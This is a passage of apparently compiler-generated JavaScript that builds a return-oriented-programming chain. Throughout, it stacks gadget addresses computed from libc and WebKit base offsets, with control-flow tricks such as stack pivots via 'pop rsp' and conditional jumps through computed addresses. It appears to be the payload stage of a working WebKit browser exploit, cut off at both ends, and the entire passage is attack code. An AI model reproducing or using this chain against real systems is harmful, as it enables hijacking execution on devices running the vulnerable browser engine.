libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+250264, //L4581
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4580:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4581:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4582:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+250376, //L4584
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4583:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4584:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4585:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+250480, //L4586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+250496, //L4587
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4586:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4587:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+250672, //L4589
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+250688, //L4590
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+250656, //L4588
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4588:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4589:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4590:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+250832, //L4593
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+250848, //L4594
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+250800, //L4591
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4591:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4592:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4593:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4594:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+250920, //L4595
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4595:
db([0, 0]); // 0x0
//L4567:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+251048, //L4598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+251064, //L4599
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+251032, //L4597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4597:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4598:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4599:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+251176, //L4601
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+251224, //L4604
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+251192, //L4602
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4601:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4602:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4603:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4604:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+251336, //L4605+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+251328, //L4605
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4605:
db([0, 0]); // 0x0
set_gadgets([
ropchain+251352, //L4605+24
ropchain+253376, //L4600
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+251392, //L4606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4606:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4607:
db([88, 0]); // 0x58
set_gadget(libc_base+144605,); //pop rdi
//L4608:
db([88, 0]); // 0x58
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+251584, //L4612
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+251552, //L4610
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+251568, //L4611
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4609:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4610:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4611:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4612:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+251640, //L4614
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4614:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+251768, //L4616
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+251784, //L4617
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+251752, //L4615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4615:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4616:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4617:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+251880, //L4619
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+251864, //L4618
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4618:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4619:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+251960, //L4620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4620:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4622:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+252080, //L4625
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+252064, //L4623
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4623:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4625:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+252224, //L4628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+252192, //L4626
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+252208, //L4627
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4626:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4627:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4628:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+252296, //L4630
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4630:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+252352, //L4631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4631:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+252432, //L4633
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4633:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4635:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+252552, //L4638
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+252536, //L4636
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4636:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4638:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+252696, //L4641
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+252664, //L4639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+252680, //L4640
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4639:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4640:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4641:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+252784, //L4643
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4642:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L4643:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+252840, //L4644
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4644:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4646:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+252920, //L4648
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4648:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+253024, //L4649
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+253040, //L4650
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4649:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4650:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+253128, //L4652
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4652:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+253184, //L4653
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4653:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+253256, //L4656
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4656:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+253312, //L4657
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4657:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+258080, //L4659
//L4600:
libc_base+764760, //pop rsi
ropchain+253416, //L4660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4660:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4662:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+253536, //L4665
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+253520, //L4663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4663:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4665:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+253712, //L4668
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+253728, //L4669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+253680, //L4666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+253696, //L4667
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4666:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4667:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4668:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4669:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+253888, //L4673
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+253856, //L4671
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+253872, //L4672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4670:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4671:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4672:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4673:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+253992, //L4675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+253976, //L4674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4674:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4675:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+254088, //L4677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4676:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4677:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4678:
db([2, 0]); // 0x2
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+254192, //L4679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+254208, //L4680
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4679:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4680:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+254376, //L4682
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+254392, //L4683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+254360, //L4681
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4681:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4682:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4683:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+254552, //L4688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+254568, //L4689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+254504, //L4685
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4685:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4686:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4687:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4688:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4689:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+254680, //L4690+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+254672, //L4690
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4690:
db([0, 0]); // 0x0
set_gadgets([
ropchain+254696, //L4690+24
ropchain+255648, //L4684
libc_base+764760, //pop rsi
ropchain+254736, //L4691
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4691:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4693:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+254856, //L4696
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+254840, //L4694
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4694:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4696:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+255000, //L4699
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+254968, //L4697
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+254984, //L4698
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4697:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4698:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4699:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+255096, //L4701
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4700:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4701:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4702:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+255200, //L4703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+255216, //L4704
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4703:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4704:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+255392, //L4706
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+255408, //L4707
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+255376, //L4705
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4705:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4706:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4707:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+255552, //L4710
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+255568, //L4711
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+255520, //L4708
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4708:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4709:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4710:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4711:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+255640, //L4712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4712:
db([0, 0]); // 0x0
//L4684:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+255768, //L4715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+255784, //L4716
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+255752, //L4714
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4714:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4715:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4716:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+255896, //L4718
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+255944, //L4721
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+255912, //L4719
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4718:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4719:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4720:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4721:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+256056, //L4722+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+256048, //L4722
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4722:
db([0, 0]); // 0x0
set_gadgets([
ropchain+256072, //L4722+24
ropchain+258080, //L4717
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+256112, //L4723
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4723:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4724:
db([98, 0]); // 0x62
set_gadget(libc_base+144605,); //pop rdi
//L4725:
db([98, 0]); // 0x62
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+256304, //L4729
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+256272, //L4727
